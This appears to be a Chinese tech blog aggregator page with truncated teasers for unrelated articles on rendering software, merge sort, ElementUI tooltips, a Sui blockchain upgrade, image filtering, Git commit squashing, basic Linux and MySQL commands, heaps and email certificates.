軟件介紹 Enscape 是專門為建筑、規劃、景觀及室內設計師打造的渲染產品&#xff0c;無需導入導出文件&#xff0c;在常用的軟件內部即可看到逼真的渲染效果。 你無需了解記憶各種參數的用法&#xff0c;一切都是傻瓜式的一鍵渲染&#xff0c;你可以把精力更多地投入到設計中…

歸并排序——二路歸并排序

目錄 1、簡述 2、復雜度 3、穩定性 4、例子 1、簡述 二路歸并排序&#xff08;Merge Sort&#xff09;是一種基于分治法的排序算法&#xff0c;通過將數組遞歸地拆分成兩部分&#xff0c;分別排序后再合并&#xff0c;從而實現整個數組的有序。二路歸并排序具有穩定性和高…

ElementUI之el-tooltip顯示多行內容

ElementUI之el-tooltip顯示多行內容 文章目錄 ElementUI之el-tooltip顯示多行內容1. 多行文本實現2. 實現代碼3. 展示效果 1. 多行文本實現 展示多行文本或者是設置文本內容的格式&#xff0c;使用具名 slot 分發content&#xff0c;替代tooltip中的content屬性。 2. 實現代碼 …

Sui主網升級至V1.26.2版本

Sui主網現已升級至V1.26.2版本&#xff0c;同時Sui協議升級至48版本。 其他升級要點如下所示&#xff1a; 協議 #17881 Sui原生隨機性功能現在已在測試網啟用。 索引器 #17649 JSON-RPC&#xff1a;現在JSON-RPC在查詢時將返回正確的幣種元數據和總供應量信息。 索引器…

【圖像處理與機器視覺】灰度變化與空間濾波

基礎 空間域與變換域 空間域&#xff1a;認為是圖像本身&#xff0c;對于空間域的操作就是對圖像中的像素直接進行修改 變換域&#xff1a;變換系數處理&#xff0c;不直接對于圖像的像素進行處理 鄰域 圖像中某點的鄰域被認為是包含該點的小區域&#xff0c;也被稱為窗口 …

在IDEA中使用Git在將多次commit合并為一次commit

案例&#xff1a; 我想要將master分支中的 測試一、測試二、測試三三次commit合并為一次commit 1. 點擊Git 2. 雙擊點擊commit所在的分支 3. 右鍵要合并的多個commit中的第一次提交的commit 4. 點擊右鍵后彈出的菜單中的Interactively Rebase From Here選項 5. 點擊測試二…

常用Linux命令的具體使用示例

文件操作類&#xff1a; ls -l: 列出當前目錄下所有文件和目錄的詳細信息。cd /home: 切換到/home目錄。pwd: 顯示當前工作目錄的完整路徑。cp source.txt destination.txt: 將source.txt文件復制到destination.txt。mv oldname.txt newname.txt: 將文件oldname.txt重命名為ne…

MySQL排序操作

025排序操作 select .. from .. order by 字段 asc/descselect empno, ename, sal from emp order by sal asc;asc 不寫的話&#xff0c;默認升序 多個字段排序 查詢員工的編號、姓名、薪資&#xff0c;按照薪資升序排列&#xff0c;如果薪資相同的&#xff0c;再按照姓名升…

二叉樹的順序結構(堆的實現)

前言 普通的二叉樹是不適合用數組來存儲的&#xff0c;因為可能會存在大量的空間浪費。而完全二叉樹更適合使用順序結 構存儲。 現實中我們通常把堆 ( 一種二叉樹 ) 使用順序結構的數組來存儲&#xff0c;需要注意的是這里的堆和操作系統 虛擬進程地址空間中的堆是兩回事&…

問題:8255A的端口A工作在方式2時,使用端口C的______作為與CPU和外部設備的聯絡信號。 #媒體#經驗分享#其他

問題&#xff1a;8255A的端口A工作在方式2時&#xff0c;使用端口C的______作為與CPU和外部設備的聯絡信號。 參考答案如圖所示

郵件安全證書,保障通信安全的必備利器

在數字通信日益普及的今天&#xff0c;電子郵件的安全性越來越受到人們的關注。郵件安全證書&#xff0c;作為保障郵件通信安全的重要工具&#xff0c;逐漸走進了大眾的視野。本文將為大家揭秘郵件安全證書&#xff0c;解答關于它的常見問題&#xff0c;幫助大家更好地了解和使…